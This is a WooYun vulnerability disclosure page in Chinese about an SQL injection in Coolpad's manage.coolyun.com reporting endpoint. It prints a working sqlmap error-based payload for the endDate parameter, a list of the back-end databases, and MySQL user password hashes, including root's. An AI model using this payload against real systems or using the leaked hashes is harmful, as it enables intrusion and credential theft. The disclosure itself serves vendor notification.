当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-090915

漏洞标题:酷派某系统高危SQL注入

相关厂商:yulong.com

漏洞作者: if、so

提交时间:2015-01-09 21:30

修复时间:2015-02-23 21:32

公开时间:2015-02-23 21:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-01-09: 细节已通知厂商并且等待厂商处理中
2015-01-12: 厂商已经确认,细节仅向厂商公开
2015-01-22: 细节向核心白帽子及相关领域专家公开
2015-02-01: 细节向普通白帽子公开
2015-02-11: 细节向实习白帽子公开
2015-02-23: 细节向公众公开

简要描述:

酷派某处高危注入,root权限

详细说明:

http://manage.coolyun.com/report/appreport (POST)
endDate=2015-01-08&ktype=&payTranslog.count=&payTranslog.failcause=&currentPage=&startDate=2015-01-08
参数enddate

sqlmap identified the following injection points with a total of 36 HTTP(s) requests:
---
Place: POST
Parameter: endDate
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: endDate=2015-01-08' AND (SELECT 2903 FROM(SELECT COUNT(*),CONCAT(0x3a6b64763a,(SELECT (CASE WHEN (2903=2903) THEN 1 ELSE 0 END)),0x3a69756c3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'JvPz'='JvPz&ktype=&payTranslog.count=&payTranslog.failcause=&currentPage=&startDate=2015-01-08
---
web application technology: PHP 5.4.13
back-end DBMS: MySQL 5.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: endDate
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: endDate=2015-01-08' AND (SELECT 2903 FROM(SELECT COUNT(*),CONCAT(0x3a6b64763a,(SELECT (CASE WHEN (2903=2903) THEN 1 ELSE 0 END)),0x3a69756c3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'JvPz'='JvPz&ktype=&payTranslog.count=&payTranslog.failcause=&currentPage=&startDate=2015-01-08
---
web application technology: PHP 5.4.13
back-end DBMS: MySQL 5.0
available databases [12]:
[*] coolmsg
[*] db_yl_coolshow_charge_data
[*] db_yl_coolshow_charge_data_20141118
[*] db_yl_coolshow_charge_data_20150106
[*] db_yl_coolshow_charge_data_20150109
[*] db_yl_coolshow_charge_records
[*] db_yl_health
[*] db_yl_weather
[*] information_schema
[*] mysql
[*] performance_schema
[*] test


database management system users password hashes:
[*] admin [1]:
    password hash: *A45ED16ACB66C7B8E6365D53A5718C7770A10DDA
[*] coolcloud [1]:
    password hash: *681EAB6E64F2549A082F9DAAAA6D05D9171F4802
[*] coolmsg [1]:
    password hash: *BECF2A4520E3ABA9A5C7B549D3E22CCDE99BC83D
[*] coolshow [1]:
    password hash: *2BA75530738A4A2371FF1F606CE13484CDA4CE14
[*] health [1]:
    password hash: *96E1E8EE2F15CD75D11757F0B0AFB48DC7B7D094
[*] root [1]:
    password hash: *F66B0A1403B214CC3AC0CAACF3C0D8464E4E397A
[*] weather [1]:
    password hash: *96E1E8EE2F15CD75D11757F0B0AFB48DC7B7D094

漏洞证明:

sqlmap identified the following injection points with a total of 36 HTTP(s) requests:
---
Place: POST
Parameter: endDate
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: endDate=2015-01-08' AND (SELECT 2903 FROM(SELECT COUNT(*),CONCAT(0x3a6b64763a,(SELECT (CASE WHEN (2903=2903) THEN 1 ELSE 0 END)),0x3a69756c3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'JvPz'='JvPz&ktype=&payTranslog.count=&payTranslog.failcause=&currentPage=&startDate=2015-01-08
---
web application technology: PHP 5.4.13
back-end DBMS: MySQL 5.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: endDate
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: endDate=2015-01-08' AND (SELECT 2903 FROM(SELECT COUNT(*),CONCAT(0x3a6b64763a,(SELECT (CASE WHEN (2903=2903) THEN 1 ELSE 0 END)),0x3a69756c3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'JvPz'='JvPz&ktype=&payTranslog.count=&payTranslog.failcause=&currentPage=&startDate=2015-01-08
---
web application technology: PHP 5.4.13
back-end DBMS: MySQL 5.0
available databases [12]:
[*] coolmsg
[*] db_yl_coolshow_charge_data
[*] db_yl_coolshow_charge_data_20141118
[*] db_yl_coolshow_charge_data_20150106
[*] db_yl_coolshow_charge_data_20150109
[*] db_yl_coolshow_charge_records
[*] db_yl_health
[*] db_yl_weather
[*] information_schema
[*] mysql
[*] performance_schema
[*] test


database management system users password hashes:
[*] admin [1]:
    password hash: *A45ED16ACB66C7B8E6365D53A5718C7770A10DDA
[*] coolcloud [1]:
    password hash: *681EAB6E64F2549A082F9DAAAA6D05D9171F4802
[*] coolmsg [1]:
    password hash: *BECF2A4520E3ABA9A5C7B549D3E22CCDE99BC83D
[*] coolshow [1]:
    password hash: *2BA75530738A4A2371FF1F606CE13484CDA4CE14
[*] health [1]:
    password hash: *96E1E8EE2F15CD75D11757F0B0AFB48DC7B7D094
[*] root [1]:
    password hash: *F66B0A1403B214CC3AC0CAACF3C0D8464E4E397A
[*] weather [1]:
    password hash: *96E1E8EE2F15CD75D11757F0B0AFB48DC7B7D094

修复方案:

。。

版权声明:转载请注明来源 if、so@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-01-12 15:44

厂商回复:

感谢提供,已提交给业务部门紧急处理。

最新状态:

暂无

漏洞评价:

评论

  1. 2015-01-09 21:31 | U神 ( 核心白帽子 | Rank:1285 漏洞数:142 | 感谢乌云,知恩不忘,其实我一直都在乌云默...)

    核心你好

  2. 2015-01-09 21:34 | if、so 认证白帽子 ( 核心白帽子 | Rank:1008 漏洞数:91 | 梦想还是要有的,万一实现了呢?)

    @U神 核心你好

  3. 2015-01-09 21:44 | 浩天 认证白帽子 ( 普通白帽子 | Rank:915 漏洞数:79 | 度假中...)

    你们是不想让我睡觉了,手里都藏这么多漏洞!! @xsser

  4. 2015-01-09 21:51 | if、so 认证白帽子 ( 核心白帽子 | Rank:1008 漏洞数:91 | 梦想还是要有的,万一实现了呢?)

    @浩天 为了部落

  5. 2015-01-09 21:52 | 子非海绵宝宝 认证白帽子 ( 核心白帽子 | Rank:1044 漏洞数:106 | 发扬海绵宝宝的精神!你不是海绵宝宝,你怎...)

    @if、so 绕了酷派吧....人家都哭了

  6. 2015-01-10 22:39 | 3King ( 普通白帽子 | Rank:1129 漏洞数:92 | 【study at HNUST】非常感谢大家的关注~ 大...)

    高产呀

  7. 2015-02-24 21:14 | 静默 ( 路人 | Rank:8 漏洞数:6 | 安全小白)

    像酷派这些给手机装那么大的后门的厂商,要我,我就不留情